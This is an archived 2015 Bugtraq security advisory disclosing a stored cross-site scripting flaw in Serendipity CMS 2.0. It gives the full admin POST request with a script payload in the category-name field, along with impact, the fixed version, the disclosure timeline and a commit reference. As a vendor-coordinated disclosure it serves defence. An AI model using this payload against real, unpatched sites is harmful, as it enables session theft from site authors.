lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 13 Mar 2015 15:44:13 GMT
From: edric@...rterbitbybit.com
To: bugtraq@...urityfocus.com
Subject: Serendipity CMS - XSS Vulnerability in Version 2.0

Serendipity CMS - XSS Vulnerability in Version 2.0

----------------------------------------------------------------

Product Information:

Software: Serendipity CMS
Tested Version: 2.0, released 23.1.2015
Vulnerability Type: Cross-Site Scripting (CWE-79)
Download link: http://www.s9y.org/12.html
Description: Serendipity is aimed to make everything possible you ever wish for. It is technically up to par to other well-known weblog scripts like Moveable Type or Wordpress. (copied from http://www.s9y.org/3.html)

----------------------------------------------------------------

Vulnerability description:

XSS is found in category creation page.

When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 394
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=; serendipity[sortorder_order]=; serendipity[sortorder_ordermode]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7

serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS.

The payload is executed when an authenticated user navigates to the "New Entry" page.

----------------------------------------------------------------

Impact:

An attacker is able to leverage on the XSS vulnerability to exploit content creator of Serendipity CMS. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF.

----------------------------------------------------------------

Solution:

Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html

----------------------------------------------------------------

Timeline:

Vulnerability found: 12.3.2015
Vendor informed: 12.3.2015
Response by vendor: 12.3.2015
Fix by vendor 12.3.2015
Public Advisory: 13.3.2015

----------------------------------------------------------------

Reference:

https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d

----------------------------------------------------------------

Best regards,
Edric Teo

Powered by blists - more mailing lists